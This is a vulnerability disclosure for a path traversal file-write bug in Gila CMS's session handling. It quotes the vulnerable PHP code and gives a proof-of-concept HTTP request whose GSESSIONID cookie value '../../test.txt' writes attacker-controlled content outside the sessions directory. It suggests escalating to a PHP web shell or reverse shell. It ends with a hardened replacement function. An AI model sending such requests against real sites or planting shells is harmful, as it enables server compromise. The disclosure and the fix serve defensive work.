Gila CMS (https://github.com/GilaCMS/gila) is an open-source CMS web application. An arbitrary file write vulnerability was found in the Gila CMS Session component in versions before 2.0.1, which may lead to more serious issues.
Here we take Gila version 1.5.3 as the example: https://github.com/GilaCMS/gila/tree/85e7052a90523127bb1759969fb180131e7de90d. Versions up to and including 2.0.0 were tested.
The problem is in Session.php: https://github.com/GilaCMS/gila/blob/85e7052a90523127bb1759969fb180131e7de90d/src/core/classes/Session.php, where the path is not filtered when the session file is saved. The user controls both the file name (via the GSESSIONID cookie) and part of the file content (via the User-Agent header).
    // Vulnerable code as shipped in 1.5.3: $gsession comes straight from the
    // GSESSIONID cookie and is concatenated into the path with no validation,
    // so "../" sequences escape the sessions directory.
    public static function createFile($gsession)
    {
        $data = [
            'user_agent' => $_SERVER['HTTP_USER_AGENT'] // attacker-controlled content
        ];
        file_put_contents(LOG_PATH.'/sessions/'.$gsession, json_encode($data));
    }
After installing Gila CMS, a user can send the following HTTP request (for example, crafted in Burp Suite):
GET /gila/?c=admin HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../test.txt
This creates the file test.txt in the webapp home directory /var/www/html/gila. The cookie value can point to folders outside the web root /var/www/html as long as the web server has write access there, which could definitely lead to more serious exploits. For instance, a user can write <php shellexec() ?> into a .php file, or just use a PHP reverse shell.
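For comparison, the following is a hardened variant of createFile() written for this write-up (it is an added example, not Gila's own code or its upstream fix). It restricts the session id to an alphanumeric token and confirms the resolved path stays inside the sessions directory; LOG_PATH is assumed to play the same role as Gila's constant and is pointed at a temporary directory so the script runs stand-alone.

```php
<?php
// Added example, not Gila's code: LOG_PATH is assumed to mirror Gila's
// constant but is set to a temp directory here so the script runs offline.
define('LOG_PATH', sys_get_temp_dir() . '/gila_example_log');
@mkdir(LOG_PATH . '/sessions', 0700, true);

function isValidSessionId(string $gsession): bool
{
    // Session ids are opaque alphanumeric tokens; anything containing
    // slashes, dots, NUL bytes or an empty string is rejected outright.
    return preg_match('/^[A-Za-z0-9]{16,128}$/', $gsession) === 1;
}

function createFileHardened(string $gsession, string $userAgent): bool
{
    if (!isValidSessionId($gsession)) {
        // Log the rejected value hex-encoded so the log line itself cannot
        // carry traversal sequences or control characters.
        error_log('rejected GSESSIONID: ' . bin2hex($gsession));
        return false;
    }

    $dir = realpath(LOG_PATH . '/sessions');
    if ($dir === false) {
        return false;
    }
    $target = $dir . DIRECTORY_SEPARATOR . $gsession;

    // Defence in depth: even with the allow-list above, confirm the final
    // path is a direct child of the sessions directory before writing.
    if (dirname($target) !== $dir) {
        return false;
    }

    // Cap the stored User-Agent so a client cannot bloat the session file.
    $data = ['user_agent' => substr($userAgent, 0, 512)];
    return file_put_contents($target, json_encode($data), LOCK_EX) !== false;
}

// Constructed inputs: the traversal value from the request above, which must
// be refused, and a freshly generated well-formed id, which must be accepted.
var_dump(createFileHardened('../../test.txt', 'arbitrary content'));
var_dump(createFileHardened(bin2hex(random_bytes(16)), 'Mozilla/5.0'));
```

The first call returns false and writes nothing; the second writes a JSON file under the sessions directory only.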